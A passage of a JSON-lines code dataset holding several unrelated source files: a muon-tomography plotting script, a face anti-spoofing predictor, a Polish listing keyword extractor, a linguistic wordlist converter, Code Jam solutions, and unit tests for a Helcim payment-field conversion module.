file_object.readlines()\r\n for line in lines:\r\n # print(line.rstrip())\r\n TX = line.split(' ' or '\\n')\r\n x.append(float(TX[0]))\r\n y.append(float(TX[1]))\r\n z.append(float(TX[2]))\r\n r.append(float(TX[3]))\r\n l = len(r)\r\n print('总数据个数: ',len(r))\r\n r = np.array(r)\r\n mask1 = -0.02 > r\r\n mask2 = 0.02 < r\r\n mask = mask1 + mask2\r\n x = np.array(x)\r\n y = np.array(y)\r\n z = np.array(z)\r\n x = x[mask]\r\n y = y[mask]\r\n z = z[mask]\r\n x = list(x)\r\n y = list(y)\r\n z = list(z)\r\n #l = len(x)\r\n print('有效数据个数: ',len(x), len(y), len(z))\r\n pos = np.empty((l, 3))\r\n po = list(zip(x, y, z))\r\n p = np.array(po)\r\n size = np.empty((l))\r\n size[:] = 1\r\n color = np.empty((l, 4))\r\n color[:] = (1.0, 0.6, 0.0, 0.5)\r\n size[:] = self.ui.horizontalSlider.value() / 10\r\n color[:] = (1.0, 0.6, 0.0, self.ui.horizontalScrollBar.value() / 100)\r\n sp1 = gl.GLScatterPlotItem(pos=p, size=size, color=color, pxMode=False)\r\n plot_plt1.addItem(sp1)\r\n plot_plt2.addItem(sp1)\r\n plot_plt3.addItem(sp1)\r\n print(threading.currentThread(), time.ctime(time.time()), '3')\r\n QApplication.processEvents()\r\n\r\n while os.access(name, os.F_OK):\r\n X, Y, Z, R = [], [], [], []\r\n with open(name) as file_object:\r\n lines = file_object.readlines()\r\n for line in lines:\r\n # print(line.rstrip())\r\n TX = line.split(' ' or '\\n')\r\n X.append(float(TX[0]))\r\n Y.append(float(TX[1]))\r\n Z.append(float(TX[2]))\r\n R.append(float(TX[3]))\r\n print(len(R),'R长度')\r\n print(len(r),'r长度')\r\n if len(r) == len(R):\r\n print('进入=')\r\n for i in range(0,1500):\r\n QApplication.processEvents()\r\n time.sleep(0.01)\r\n timebar +=1\r\n\r\n elif len(R) > len(r):\r\n print('进入>')\r\n plot_plt2.items.remove(sp1)\r\n timebar =0\r\n L = len(R)\r\n r = np.array(R)\r\n mask1 = -0.02 > r\r\n mask2 = 0.02 < r\r\n mask = mask1 + mask2\r\n X = np.array(X)\r\n Y = np.array(Y)\r\n Z = np.array(Z)\r\n X = X[mask]\r\n Y = Y[mask]\r\n Z = Z[mask]\r\n X = list(X)\r\n Y = list(Y)\r\n Z = list(Z)\r\n L = len(X)\r\n print('有效数据的个数: ', len(X), len(Y), len(Z))\r\n pos = np.empty((l, 3))\r\n po = list(zip(X, Y, Z))\r\n p = np.array(po)\r\n print(p)\r\n #d = (p ** 2).sum(axis=1) ** 0.5\r\n size = np.empty((L))\r\n size[:] = 1\r\n color = np.empty((L, 4))\r\n color[:] = (1.0, 0.6, 0.0, 0.5)\r\n size[:] = self.ui.horizontalSlider.value() / 10\r\n color[:] = (1.0, 0.6, 0.0, self.ui.horizontalScrollBar.value() / 100)\r\n sp1 = gl.GLScatterPlotItem(pos=p, size=size, color=color, pxMode=False)\r\n plot_plt1.addItem(sp1)\r\n plot_plt2.addItem(sp1)\r\n 
plot_plt3.addItem(sp1)\r\n print(threading.currentThread(), time.ctime(time.time()), '3')\r\n QApplication.processEvents()\r\n\r\n else:\r\n print('wrong')\r\n\r\n if timebar == 2:\r\n print('没了')\r\n break\r\n\r\n\r\n\r\n'''直接使用师兄给的文件\r\nfilename2 = 'C:\\\\Users\\\\obigo\\\\Desktop\\\\fec_mpgd_ws_334w_al_20191211_0-0DD.dat'\r\nfilename1 = 'C:/Users/obigo/Desktop/222222.dat'\r\nstrb = '中国'\r\ndef writedat():\r\n i = 0\r\n with open(filename2,'rb') as fileobject:\r\n contents = fileobject.read()\r\n print(type(contents))\r\n with open(filename1, mode='wb', buffering=-1, encoding=None, errors=None, newline=None, closefd=True, opener=None) as fileobject:\r\n fileobject.write(contents)\r\n #f = open(filename2,'r')\r\n #f.close()\r\n\r\nwritedat()\r\n'''","repo_name":"obigozw/Muon-Tomography-Software-Design","sub_path":"PyQt5/createdat.py","file_name":"createdat.py","file_ext":"py","file_size_in_byte":10112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2585379358","text":"import os\nimport torch \nfrom src.utils import parse_model_name , get_kernel\nimport torch.nn.functional as F\nfrom src.models.MiniFASNet import MiniFASNetV2,MiniFASNetV1SE\nfrom src.transformers import transform as trans\nMODEL_MAPPING = {\n 'MiniFASNetV2': MiniFASNetV2,\n 'MiniFASNetV1SE':MiniFASNetV1SE,\n}\nclass AntiSpoofPredict():\n def __init__(self, device_id):\n super(AntiSpoofPredict, self).__init__()\n self.device = torch.device(\"cuda:{}\".format(device_id)\n if torch.cuda.is_available() else \"cpu\")\n def _load_model(self, model_path):\n model_name = os.path.basename(model_path)\n h_input, w_input, model_type, _ = parse_model_name(model_name)\n self.kernel_size = get_kernel(h_input, w_input,)\n self.model = MODEL_MAPPING[model_type](conv6_kernel=self.kernel_size).to(self.device)\n state_dict = torch.load(model_path, map_location=self.device)\n keys = iter(state_dict)\n first_layer_name = keys.__next__()\n if first_layer_name.find('module.') >= 0:\n from collections import OrderedDict\n new_state_dict = OrderedDict()\n for key, value in state_dict.items():\n name_key = key[7:]\n new_state_dict[name_key] = value\n self.model.load_state_dict(new_state_dict)\n else:\n self.model.load_state_dict(state_dict)\n return None\n\n def predict(self, img,model_path):\n test_transform = trans.Compose([\n trans.ToTensor(),\n ])\n img = test_transform(img)\n img = img.unsqueeze(0).to(self.device)\n self._load_model(model_path)\n self.model.eval()\n with torch.no_grad():\n result = self.model.forward(img)\n result = F.softmax(result).cpu().numpy()\n return result","repo_name":"Ali-Fayzi/anti-spoofing","sub_path":"src/anti_spoofing_predict.py","file_name":"anti_spoofing_predict.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73705581314","text":"\nfrom typing import NamedTuple, List\nfrom fuzzysearch import find_near_matches\n\nfrom flat_crawler import constants as ct\n\n\n\n\nclass Pattern(NamedTuple):\n key: str # type of info we want to extract\n word: str\n max_dist: int = 0\n lower: bool = False\n\n\nPATTERNS = [\n Pattern(key=ct.KAMIENICA_KEY, word='kamienicy', max_dist=1, lower=True),\n Pattern(key=ct.KAMIENICA_KEY, word='kamienica', max_dist=1, lower=True),\n Pattern(key=ct.MODERN_KEY, word='apartamentowiec', max_dist=1, lower=True),\n Pattern(key=ct.DEVELOPER_KEY, word='deweloper', max_dist=1, lower=True),\n Pattern(key=ct.DEVELOPER_KEY, 
word='developer', max_dist=1, lower=True),\n Pattern(key=ct.BALCONY_KEY, word='balkon', max_dist=0, lower=True),\n Pattern(key=ct.BALCONY_KEY, word='balkonem', max_dist=0, lower=True),\n Pattern(key=ct.BALCONY_KEY, word='loggia', max_dist=1, lower=True),\n Pattern(key=ct.FRENCH_BALCONY_KEY, word='balkon francuski', max_dist=3, lower=True),\n]\n\nLOCATION_PATTERNS = [\n Pattern(key=ct.LOCATION_KEY, word=word, max_dist=0, lower=True) for word in [\n 'obok', 'przy', 'niedaleko', 'zlokalizowane', 'położone', 'w okolicy', 'na', 'ul.',\n 'ulicy', 'placu',\n ]\n]\n\n\ndef extract_keys_from_text(text: str, patterns=PATTERNS):\n non_lower_pat = [p for p in patterns if not p.lower]\n lower_pat = [p for p in patterns if p.lower]\n keys = set()\n all_matches = []\n lower_text = text.lower()\n for patt in non_lower_pat + lower_pat:\n if patt.lower:\n txt = lower_text\n word = patt.word.lower()\n else:\n txt = text\n word = patt.word\n if not word:\n continue\n matches = find_near_matches(word, txt, max_l_dist=patt.max_dist)\n if matches:\n keys.add(patt.key)\n all_matches.extend(matches)\n return list(keys), [(m.start, m.end) for m in all_matches]\n\n\ndef phrase_in_text(phrase: str, text: str):\n return [(m.start, m.end) for m in find_near_matches(phrase, text, max_l_dist=0)]\n","repo_name":"Buzdygan/flats","sub_path":"m3/flat_crawler/utils/extract_info.py","file_name":"extract_info.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13509784083","text":"from lingpy import *\nfrom collections import defaultdict\n\ndef parse_thiago(string):\n strings = ['']\n for char in string:\n strings[-1] += char\n if char == '}':\n strings += ['']\n \n dsets = []\n for string in strings:\n current = ''\n bcount = 0\n data = {}\n for char in string:\n if char == '$':\n if not current:\n current = 'form'\n data[current] = ''\n else:\n current = ''\n elif char == '/':\n if not current:\n current = 'phonemic'\n data[current] = ''\n elif current == 'phonemic':\n current = ''\n else:\n data[current] += char\n elif char == '{':\n current = 'source'\n data[current] = ''\n elif char == '}':\n current = ''\n elif char == '<':\n current = 'value'\n data[current] = ''\n elif char == '(':\n bcount += 1\n if not current:\n current = 'spanish'\n data[current] = ''\n elif current == 'spanish':\n data[current] += char\n else:\n data[current] += char\n elif char == '<':\n current = 'value'\n data[current] = ''\n elif char == '>':\n current = ''\n elif char == ')':\n bcount -= 1\n if current == 'spanish' and bcount == 0:\n current = ''\n elif current == 'spanish':\n data[current] += char\n else:\n data[current] += char\n elif current:\n data[current] += char\n dsets += [data]\n return dsets\n\n\ncsv = csv2list('raw/compiled_750.tsv', strip_lines=False, comment='>>>')\nheader = csv[0][5:]\nD = {0: [\n 'doculect', \n 'concept', \n 'concept_spanish',\n 'concept_french',\n 'concept_portuguese',\n 'semantic_field',\n 'value_in_source', \n 'value',\n 'form1', 'form2', 'form', 'segments', 'source']}\nidx = 1\nconcepts = []\ncmaps = {}\nfor i, line in enumerate(csv[1:]):\n concept = line[0]\n spanish = line[1]\n french = line[2]\n port = line[3]\n rest = line[5:]\n cmaps[port] = concept\n semfield = line[4]\n concepts += [(str(i+1), concept, spanish, french, port, semfield)]\n for language, cell in zip(header, rest):\n print(cell)\n datapoints = parse_thiago(cell)\n for data in [x for x in datapoints if x]:\n form = data.get('phonemic', 
\n data.get('form', data.get('value', '')))\n if form:\n segments = ' '.join(ipa2tokens(form.replace(' ','_'), \n merge_vowels=False,\n semi_diacritics = 'hsʃzʒ'))\n new_line = [language, concept, \n spanish,\n french,\n port,\n semfield,\n cell, \n data.get('value', ''), data.get('form', ''),\n data.get('phonemic', ''), form, segments, data.get('source')]\n D[idx] = [str(x) for x in new_line]\n idx += 1\n\n\ncsv = csv2list('raw/Baniwa_only_750', strip_lines=False)\nfor i, line in enumerate(csv[1:]):\n port = line[0]\n rest = [line[1]]\n concept = cmaps.get(port, '?')\n language = 'Baniwa'\n for cell in rest:\n print(cell)\n datapoints = parse_thiago(cell)\n for data in [x for x in datapoints if x]:\n form = data.get('phonemic', \n data.get('form', data.get('value', '')))\n if form:\n segments = ' '.join(ipa2tokens(form.replace(' ','_'), \n merge_vowels=False,\n semi_diacritics = 'hsʃzʒ'))\n new_line = [language, concept, \n '',\n '',\n port,\n '',\n cell, \n data.get('value', ''), data.get('form', ''),\n data.get('phonemic', ''), form, segments, data.get('source')]\n D[idx] = [str(x) for x in new_line]\n idx += 1\n\n\nwl = Wordlist(D)\n\ncounts = defaultdict(lambda: defaultdict(list))\nproblematic = {}\nfor k, val, lang in iter_rows(wl, 'form', 'doculect'):\n try:\n tks = ipa2tokens(val, semi_diacritics='shzʃʒʂʐɕʑ', merge_vowels=False)\n cls = tokens2class(tks, 'dolgo')\n for t, c in zip(tks, cls):\n counts[lang][t, c] += [val]\n problematic[k] = ''\n except: \n problematic[k] = '!'\n\nfor lang, vals in counts.items():\n with open(lang+'.orthography.tsv', 'w') as f:\n f.write('Grapheme\\tIPA\\tFREQUENCY\\tEXAMPLE\\n')\n for (t, c), lst in sorted(counts[lang].items(), key=lambda x: len(x[1]),\n reverse=True):\n if c != '0':\n cpart = t\n else:\n cpart = ''\n print(t, c, lst)\n f.write('{0}\\t{1}\\t{2}\\t{3}\\n'.format(\n t, cpart, len(lst), lst[0]))\n\nwl.add_entries('problematic', problematic, lambda x: x)\nlex = LexStat(wl, segments='segments')\n#lex.get_scorer()\nlex.cluster(method='sca', threshold=0.45, ref='cogid')\nlex.output('tsv', filename='wordlist-750', ignore='all', prettify=False,\n subset=True, cols=['doculect', 'concept', \n 'concept_spanish',\n 'concept_french',\n 'concept_portuguese',\n 'semantic_field',\n 'value_in_source', 'value',\n 'form1', 'form2', 'form', 'segments', 'source', 'cogid', 'problematic'])\n\n\nwith open('concepts.tsv', 'w') as f:\n f.write('NUMBER\\tENGLISH\\tSPANISH\\tFRENCH\\tPORTUGUESE\\tSEMANTIC_FIELD\\n')\n for line in concepts:\n f.write('\\t'.join(line)+'\\n')\n \n\n\n","repo_name":"thiagochacon/Northern_Arawak","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":6129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23614492141","text":"from sys import argv, exit\n\nif len(argv) < 3:\n exit(\"Not enough arguments\")\n\ninput_file = argv[1]\noutput_file = argv[2]\n\n\n\nwith open(output_file, 'w') as out_desc:\n in_desc = open(input_file)\n num_cases = int(in_desc.readline().strip())\n for t in xrange(num_cases):\n parts = in_desc.readline().split()\n\n status = {'O': (1,0), 'B': (1,0)}\n\n count = 0\n\n N = int(parts[0])\n i = 1\n for _ in xrange(N):\n color = parts[i]\n button = int(parts[i+1])\n i += 2\n\n distance = abs(button-status[color][0])\n time = count-status[color][1]\n\n count += max(0, distance-time) + 1\n status[color] = (button,count)\n\n\n\n\n\n print >> out_desc, \"Case #%d: %s\" % 
(t+1,count)","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_74/476.py","file_name":"476.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12339687885","text":"\"\"\"Tests for the conversions module.\"\"\"\n# pylint: disable=protected-access\n\nfrom datetime import date, time\nfrom decimal import Decimal\nfrom unittest.mock import patch\n\nfrom helcim import conversions\n\n# *_API_FIELDS being mocked to allow proper testing of validation\nMOCK_TO_FIELDS_DECIMAL = {\n 'amount': conversions.Field('amount', 'c', 10, 100),\n}\n\nMOCK_TO_FIELDS_STRING = {\n 'cc_cvv': conversions.Field('cardCVV', 's', 3, 4),\n}\n\nMOCK_TO_FIELDS_INTEGER = {\n 'product_id': conversions.Field('productId', 'i', 1, 100),\n}\n\nMOCK_TO_FIELDS_BOOLEAN = {\n 'test': conversions.Field('test', 'b'),\n}\n\nMOCK_TO_FIELDS_ALL = {\n 'amount': conversions.Field('amount', 'c', 10, 100),\n 'cc_cvv': conversions.Field('cardCVV', 's', 3, 4),\n 'product_id': conversions.Field('productId', 'i', 1, 100),\n 'test': conversions.Field('test', 'b'),\n}\n\nMOCK_TO_FIELDS_INVALID = {\n 'invalid': conversions.Field('value', 't'),\n}\n\nMOCK_FROM_FIELDS = {\n 'amount': conversions.Field('amount', 'c'),\n 'cardNumber': conversions.Field('cc_number', 's'),\n 'transactionId': conversions.Field('transaction_id', 'i'),\n 'availability': conversions.Field('availability', 'b'),\n 'date': conversions.Field('transaction_date', 'd'),\n 'time': conversions.Field('transaction_time', 't')\n}\n\nclass InvalidField():\n def __init__(self, field_name, field_type):\n self.field_name = field_name\n self.field_type = field_type\n\nMOCK_FROM_FIELDS_INVALID = {\n 'invalid': InvalidField('field', 'x')\n}\n\ndef test__field__invalid_type():\n \"\"\"Confirms object handling of an invalid field type.\"\"\"\n try:\n conversions.Field('invalid', 'x')\n except ValueError as error:\n assert str(error) == \"Invalid field type provided for invalid: x\"\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_STRING)\ndef test__validate_request_fields__string_valid():\n \"\"\"Confirms handling of string request field.\"\"\"\n details = {\n 'cc_cvv': '123'\n }\n\n cleaned = conversions.validate_request_fields(details)\n\n assert 'cc_cvv' in cleaned\n assert cleaned['cc_cvv'] == details['cc_cvv']\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_STRING)\ndef test__validate_request_fields__string_min_invalid():\n \"\"\"Confirms handling of string minimum length validation.\"\"\"\n details = {\n 'cc_cvv': '12'\n }\n\n try:\n conversions.validate_request_fields(details)\n except ValueError as error:\n assert str(error) == \"cc_cvv field length too short.\"\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_STRING)\ndef test__validate_request_fields__string_max_invalid():\n \"\"\"Confirms handling of string maximum length validation.\"\"\"\n details = {\n 'cc_cvv': '12345'\n }\n\n try:\n conversions.validate_request_fields(details)\n except ValueError as error:\n assert str(error) == \"cc_cvv field length too long.\"\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_INTEGER)\ndef test__validate_request_fields__integer_valid():\n \"\"\"Confirms handling of integer request field.\"\"\"\n details = {\n 'product_id': 100\n }\n\n cleaned = conversions.validate_request_fields(details)\n\n assert 'product_id' in cleaned\n assert 
cleaned['product_id'] == details['product_id']\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_INTEGER)\ndef test__validate_request_fields__integer_min():\n \"\"\"Confirms handling of integer minimum value validation.\"\"\"\n details = {\n 'product_id': 0\n }\n\n try:\n conversions.validate_request_fields(details)\n except ValueError as error:\n assert str(error) == \"product_id field value too small.\"\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_INTEGER)\ndef test__validate_request_fields__integer_max():\n \"\"\"Confirms handling of integer maximum value validation.\"\"\"\n details = {\n 'product_id': 101\n }\n\n try:\n conversions.validate_request_fields(details)\n except ValueError as error:\n assert str(error) == \"product_id field value too large.\"\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_DECIMAL)\ndef test__validate_request_fields__decimal_valid():\n \"\"\"Confirms handling of decimal request field.\"\"\"\n details = {\n 'amount': Decimal('50.00')\n }\n\n cleaned = conversions.validate_request_fields(details)\n\n assert 'amount' in cleaned\n assert cleaned['amount'] == details['amount']\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_DECIMAL)\ndef test__validate_request_fields__decimal_min():\n \"\"\"Confirms handling of decimal minimum value validation.\"\"\"\n details = {\n 'amount': Decimal('1.00')\n }\n\n try:\n conversions.validate_request_fields(details)\n except ValueError as error:\n assert str(error) == \"amount field value too small.\"\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_DECIMAL)\ndef test__validate_request_fields__decimal_max():\n \"\"\"Confirms handling of decimal minimum value validation.\"\"\"\n details = {\n 'amount': Decimal('200.00')\n }\n\n try:\n conversions.validate_request_fields(details)\n except ValueError as error:\n assert str(error) == \"amount field value too large.\"\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_BOOLEAN)\ndef test__validate_request_fields__boolean_true():\n \"\"\"Confirms handling of True boolean request field.\"\"\"\n details = {\n 'test': True\n }\n\n cleaned = conversions.validate_request_fields(details)\n\n assert 'test' in cleaned\n assert cleaned['test'] == 1\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_BOOLEAN)\ndef test__validate_request_fields__boolean_false():\n \"\"\"Confirms handling of False boolean request field.\"\"\"\n details = {\n 'test': False\n }\n\n cleaned = conversions.validate_request_fields(details)\n\n assert 'test' in cleaned\n assert cleaned['test'] == 0\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_ALL)\ndef test__validate_request_fields__all_valid():\n \"\"\"Tests that validations works for all fields at once.\"\"\"\n details = {\n 'cc_cvv': '123',\n 'product_id': 100,\n 'amount': Decimal('50.00'),\n 'test': True,\n }\n\n cleaned = conversions.validate_request_fields(details)\n\n assert 'cc_cvv' in cleaned\n assert cleaned['cc_cvv'] == details['cc_cvv']\n assert 'product_id' in cleaned\n assert cleaned['product_id'] == details['product_id']\n assert 'amount' in cleaned\n assert cleaned['amount'] == details['amount']\n assert 'test' in cleaned\n assert cleaned['test'] == 1\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_ALL)\ndef test__validate_request_fields__invalid_field_name():\n \"\"\"Confirms handling when an invalid field name provide.\"\"\"\n details = {'invalid': 
'field'}\n\n try:\n conversions.validate_request_fields(details)\n except KeyError:\n assert True\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_INVALID)\ndef test__validate_request_fields__invalid_field_type():\n \"\"\"Tests that error is generated if invalid field type is passed.\"\"\"\n details = {'invalid': 'field'}\n\n try:\n conversions.validate_request_fields(details)\n except UnboundLocalError as error:\n assert str(error) == (\n \"local variable 'cleaned_value' referenced before assignment\"\n )\n else:\n assert False\n\ndef test__process_request_fields__valid():\n \"\"\"Confirms handling of Python data to Helcim API data.\"\"\"\n api = {\n 'account_id': '1',\n 'token': '2',\n 'terminal_id': '3',\n }\n cleaned = {\n 'cc_cvv': '100.00',\n }\n additional = {\n 'transactionType': 'purchase',\n }\n\n data = conversions.process_request_fields(api, cleaned, additional)\n\n assert 'accountId' in data\n assert 'apiToken' in data\n assert 'terminalId' in data\n assert 'cardCVV' in data\n assert 'transactionType' in data\n assert len(data) == 5\n\ndef test__process_request_fields__valid_no_additional():\n \"\"\"Confirms handling of Python data conversion with no extra details.\"\"\"\n api = {\n 'account_id': '1',\n 'token': '2',\n 'terminal_id': '3',\n }\n cleaned = {\n 'cc_cvv': '100.00',\n }\n\n data = conversions.process_request_fields(api, cleaned)\n\n assert 'accountId' in data\n assert 'apiToken' in data\n assert 'terminalId' in data\n assert 'cardCVV' in data\n assert len(data) == 4\n\ndef test__process_request_fields__invalid_api():\n \"\"\"Confirms handling when API details is invalid.\"\"\"\n api = {\n 'account_id': '1',\n 'terminal_id': '3',\n }\n cleaned = {\n 'cc_cvv': '100.00',\n }\n additional = {\n 'transactionType': 'purchase',\n }\n\n try:\n conversions.process_request_fields(api, cleaned, additional)\n except KeyError as error:\n assert str(error) == \"'token'\"\n else:\n assert False\n\ndef test__process_api_response__string_field():\n \"\"\"Confirms handling of an API string response field.\"\"\"\n fields = {'cardNumber': '1111********9999'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert response['cc_number'] == '1111********9999'\n assert isinstance(response['cc_number'], str)\n\ndef test__convert_helcim_response_string__field_none():\n \"\"\"Tests that string field can handle a None response.\"\"\"\n fields = {'cardNumber': None}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert response['cc_number'] is None\n\ndef test_process_api_response__decimal_field():\n \"\"\"Confirms handling of an API decimal response field.\"\"\"\n fields = {'amount': '50.01'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert response['amount'] == Decimal('50.01')\n assert isinstance(response['amount'], Decimal)\n\ndef test__convert_helcim_response__integer_field():\n \"\"\"Confirms handling of an API integer response field.\"\"\"\n fields = {'transactionId': '101'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert response['transaction_id'] == 101\n assert isinstance(response['transaction_id'], int)\n\ndef test__convert_helcim_response__boolean_field():\n \"\"\"Confirms handling of an API boolean response field.\"\"\"\n fields = {'availability': '1'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert 
response['availability'] is True\n assert isinstance(response['availability'], bool)\n\ndef test__convert_helcim_response__date_field():\n \"\"\"Confirms handling of an API date response field.\"\"\"\n fields = {'date': '2018-01-01'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert response['transaction_date'] == date(2018, 1, 1)\n assert isinstance(response['transaction_date'], date)\n\ndef test__convert_helcim_response__time_field():\n \"\"\"Confirms handling of an API time response field.\"\"\"\n fields = {'time': '08:30:15'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert response['transaction_time'] == time(8, 30, 15)\n assert isinstance(response['transaction_time'], time)\n\ndef test_process_api_response_missing_field():\n \"\"\"Confirms handling of an API response field not accounted for.\"\"\"\n fields = {'fake_field': 'fake.'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert response['fake_field'] == 'fake.'\n assert isinstance(response['fake_field'], str)\n\ndef test__convert_helcim_response__invalid_type():\n \"\"\"Confirms handling of an invalid type for a response field.\"\"\"\n fields = {'invalid': 'field'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS_INVALID\n )\n\n assert 'invalid' in response\n assert response['invalid'] == 'field'\n\ndef test__create_f4l4():\n \"\"\"Confirms the F4L4 is returned when cc_number provided.\"\"\"\n token_f4l4 = conversions.create_f4l4('1111********9999')\n\n assert token_f4l4 == '11119999'\n\ndef test__create_f4l4__with_whitespace():\n \"\"\"Confirms the F4L4 is returned when cc_number provided.\"\"\"\n token_f4l4 = conversions.create_f4l4(' 1111********9999 ')\n\n assert token_f4l4 == '11119999'\n\ndef test__create_f4l4__no_cc():\n \"\"\"Confirms the F4L4 creation can handle a missing CC number.\"\"\"\n token_f4l4 = conversions.create_f4l4(None)\n\n assert token_f4l4 is None\n\ndef test__create_raw_response__with_data():\n \"\"\"Confirms handling when data is provided.\"\"\"\n response_data = {\n 'accountId': '123456789',\n 'token': '987654321',\n }\n\n request_string = conversions.create_raw_request(response_data)\n\n assert isinstance(request_string, str)\n assert 'accountId=123456789' in request_string\n assert 'token=987654321' in request_string\n\ndef test__create_raw_response__without_data():\n \"\"\"Confirms handling when data is not provided.\"\"\"\n response_data = None\n\n request_string = conversions.create_raw_request(response_data)\n\n assert request_string is None\n\n@patch('helcim.conversions.FROM_API_FIELDS', MOCK_FROM_FIELDS)\ndef test__process_api_response__valid():\n \"\"\"Tests handling of a valid API response.\"\"\"\n api_response = {\n 'response': 1,\n 'responseMessage': 'Transaction successful.',\n 'notice': 'API v2 being depreciated.',\n 'transaction': {\n 'amount': '50.01',\n 'cardNumber': '1111********9999',\n }\n }\n raw_request = {\n 'field_1': 'Field value 1',\n 'field_2': 'Field value 2',\n }\n raw_response = 'This is a raw response.'\n\n response = conversions.process_api_response(\n api_response, raw_request, raw_response\n )\n\n assert len(response) == 8\n assert response['transaction_success'] is True\n assert response['response_message'] == 'Transaction successful.'\n assert response['notice'] == 'API v2 being depreciated.'\n assert 'field_1=Field value 1' in response['raw_request']\n assert 'field_2=Field value 
2' in response['raw_request']\n assert response['raw_response'] == 'This is a raw response.'\n assert response['amount'] == Decimal('50.01')\n assert response['cc_number'] == '1111********9999'\n assert response['token_f4l4'] == '11119999'\n\n@patch('helcim.conversions.FROM_API_FIELDS', MOCK_FROM_FIELDS)\ndef test__process_api_response__missing_transaction():\n \"\"\"Confirms handling of an API response when transaction field missing.\"\"\"\n api_response = {\n 'response': 1,\n 'responseMessage': 'Transaction successful.',\n 'notice': '',\n }\n\n response = conversions.process_api_response(api_response)\n\n assert len(response) == 5\n assert 'notice' in response\n assert 'raw_request' in response\n assert 'raw_response' in response\n assert 'response_message' in response\n assert 'transaction_success' in response\n\ndef test__process_api_response__missing_required_field():\n \"\"\"Confirms handling when a required field is missing.\"\"\"\n api_response = {\n 'response': 1,\n 'responseMessage': 'Transaction successful.',\n }\n\n try:\n conversions.process_api_response(api_response)\n except KeyError as error:\n assert str(error) == \"'notice'\"\n else:\n assert False\n\n@patch('helcim.conversions.FROM_API_FIELDS', MOCK_FROM_FIELDS)\ndef test__process_helcim_js__expected_output():\n \"\"\"Confirms output from function.\"\"\"\n api_response = {\n 'amount': '100.00',\n 'cardNumber': '1111********9999',\n }\n\n response = conversions.process_helcim_js_response(api_response)\n\n # Length of response should be 3 (cardNumber will trigger F4L4 creation)\n assert len(response) == 3\n assert 'amount' in response\n assert 'cc_number' in response\n assert 'token_f4l4' in response\n","repo_name":"studybuffalo/django-helcim","sub_path":"tests/helcim/test_conversions.py","file_name":"test_conversions.py","file_ext":"py","file_size_in_byte":16262,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"23411356791","text":"outwr = ''\r\nmgf = open('magic.txt', 'r')\r\nconts = mgf.read().split('\\n')\r\nmgf.close()\r\n\r\ncases = int(conts[0])\r\nsinO = 1\r\nsinT = 6\r\nfor cn in range(cases):\r\n\tarO = [int(i) for i in conts[sinO + int(conts[sinO])].split(' ')]\r\n\tarT = [int(i) for i in conts[sinT + int(conts[sinT])].split(' ')]\r\n\tprint (arO, arT)\r\n\tbadM = False\r\n\tbadV = True\r\n\tsame = -1\r\n\tfor i in arO:\r\n\t\tfor j in arT:\r\n\t\t\tif i==j:\r\n\t\t\t\tif same != -1: badM = True\r\n\t\t\t\tbadV = False\r\n\t\t\t\tsame = i\r\n\tif badV: out = 'Volunteer cheated!'\r\n\telif badM: out = 'Bad magician!'\r\n\telse: out = str(same)\r\n\tsinO += 10\r\n\tsinT += 10\r\n\toutwr += 'Case #' + str(cn+1) + ': ' + out + '\\n'\r\n\r\noutf = open('out.txt', 'w')\r\noutf.write(outwr)\r\noutf.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/1631.py","file_name":"1631.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40247614749","text":"# encoding: utf-8\nfrom schools.views import SchoolView, SchoolHomeView, SchoolCourseView, SchoolDescView, SchoolLecturerView, \\\n LecturerListView, LecturerDetailView\n\n__author__ = 'Shirlesha'\n__date__ = 